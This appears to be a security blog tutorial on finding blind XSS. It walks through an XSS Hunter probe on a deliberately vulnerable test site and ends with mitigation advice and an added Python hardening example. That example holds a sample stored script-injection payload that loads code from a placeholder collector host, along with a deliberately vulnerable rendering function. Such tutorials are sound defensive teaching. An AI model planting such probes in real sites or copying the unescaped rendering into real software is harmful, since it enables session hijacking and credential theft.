Find Your First Blind XSS! (Securium Solutions)

Greetings everyone! Hope everything is going well. In our previous blog we discussed what XSS (cross-site scripting) is and how it works; in this blog we will go through Blind XSS.

Table of Content

  • What is Blind XSS?
  • Impact of Blind XSS
  • Common tools for Blind XSS
  • How to test for Blind XSS (example walkthrough)
  • How to mitigate against Blind XSS

Before we start, if you are not aware of what Blind XSS is: Blind XSS (cross-site scripting) behaves like stored XSS, and the end result is the same as with reflected or stored XSS. The difference is that the attacker submits a JavaScript payload through an input parameter, the server stores it, and it later executes in a different context that the attacker cannot see, for example a developer's or administrator's internal application when that data is displayed there. An attacker typically submits the payload through a comment box, feedback form, chat application or forum. It is harder to detect than stored or reflected XSS because the attacker never directly observes the payload executing.

Impact of Blind XSS

The impact is the same for blind, reflected and stored XSS:

  1. Hijacking a user or admin session
  2. Account takeover
  3. Performing phishing attacks
  4. Stealing user or admin cookies and credentials

Common tools for Blind XSS

XSS Hunter: https://xsshunter.com/

Dalfox: https://github.com/hahwul/dalfox

How to test for Blind XSS?

For testing purposes our target website is http://testphp.vulnweb.com/. We have logged in and are now in the user dashboard section.

As the screenshot above shows, we are now in the user profile dashboard, which has several input fields that store user data.

Here we use the tool XSS Hunter, which makes it easy to verify blind XSS. Go to https://xsshunter.com/ and create your account.

The screenshot above shows the XSS Hunter interface. Log in and you will see a dashboard that already lists different generated payloads to help our testing phase; it also creates a collection server for each user. Note: we can use different payloads by including the server address.

The screenshot above shows the interface with the different payloads.

Now navigate to http://testphp.vulnweb.com/. As the screenshot below shows, there is a Name input field. Submit our XSS Hunter payload in the name field.

We submitted our payload and it got executed.

Now navigate to your XSS Hunter panel and go to the XSS Fires section to see whether our XSS worked or not.

As the screenshot above shows, our XSS payload fired on the application due to improper validation of input, and the fire report gives us the user's session, IP address, etc.

We captured the user's IP address and cookies, which here contain the username and password. This is how Blind XSS works. Hopefully you can now easily find it on your target website when doing penetration testing or bug bounty hunting.

How to Mitigate Against the Risk:

To mitigate it we have to follow some steps:

  1. At the point where user input is inserted, filter as strictly as possible based on what is expected or valid input.
  2. Use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur.
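As an added example (not code from the original blog or from Securium Solutions), here is a Python sketch of how an internal dashboard that displays stored profile data, like the admin view that a blind XSS payload fires in, can apply both steps: a strict allowlist where the name is accepted, output encoding where it is displayed, and a CSP on the dashboard response. The stored record, the allowlist rule, the `collector.example` host and the `/csp-report` path are all constructed placeholders.

```python
import html
import re

# Constructed sample of a stored profile record. The "name" value stands in for a
# blind-XSS probe that loads a script from a collection server (placeholder host).
STORED_PROFILE = {
    "name": '"><script src="https://collector.example/probe.js"></script>',
    "email": "user@example.com",
}

# Step 1: strict allowlist at the point the input is accepted (hypothetical rule:
# a letter followed by up to 63 letters, spaces, dots, apostrophes or hyphens).
NAME_RE = re.compile(r"[A-Za-z][A-Za-z .'-]{0,63}")


def validate_name(value: str) -> bool:
    return NAME_RE.fullmatch(value) is not None


def render_admin_row_vulnerable(profile: dict) -> str:
    # Raw interpolation: whatever was stored is parsed as HTML by the admin's browser.
    return f'<tr><td>{profile["name"]}</td><td>{profile["email"]}</td></tr>'


def render_admin_row_safe(profile: dict) -> str:
    # Output encoding for the HTML text context: <, >, &, " and ' become entities,
    # so a stored payload is displayed as text instead of being executed.
    cells = (html.escape(profile["name"], quote=True),
             html.escape(profile["email"], quote=True))
    return "<tr><td>{}</td><td>{}</td></tr>".format(*cells)


# Step 2: CSP for the internal dashboard. No inline scripts and no third-party
# script origins, so even a payload that slips past encoding cannot load probe.js
# from collector.example; violations are reported to the app, which aids detection.
CSP_HEADER = (
    "Content-Security-Policy",
    "default-src 'self'; script-src 'self'; object-src 'none'; "
    "base-uri 'none'; frame-ancestors 'none'; report-uri /csp-report",
)


def admin_dashboard_response(profile: dict) -> tuple:
    """Return (headers, body) for the hardened admin view of one profile."""
    body = "<table>" + render_admin_row_safe(profile) + "</table>"
    headers = {"Content-Type": "text/html; charset=utf-8", CSP_HEADER[0]: CSP_HEADER[1]}
    return headers, body


if __name__ == "__main__":
    print("name accepted by allowlist:", validate_name(STORED_PROFILE["name"]))
    print(render_admin_row_vulnerable(STORED_PROFILE))
    print(admin_dashboard_response(STORED_PROFILE)[1])
```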


Conclusion: In today's blog we discussed how Blind XSS works and how to look for it, along with its common impact and the mitigations against the risk, using a suitable exploitation example.

Thanks for reading... See you in another blog!

Author

Pallab Jyoti Borah

VAPT Analyst
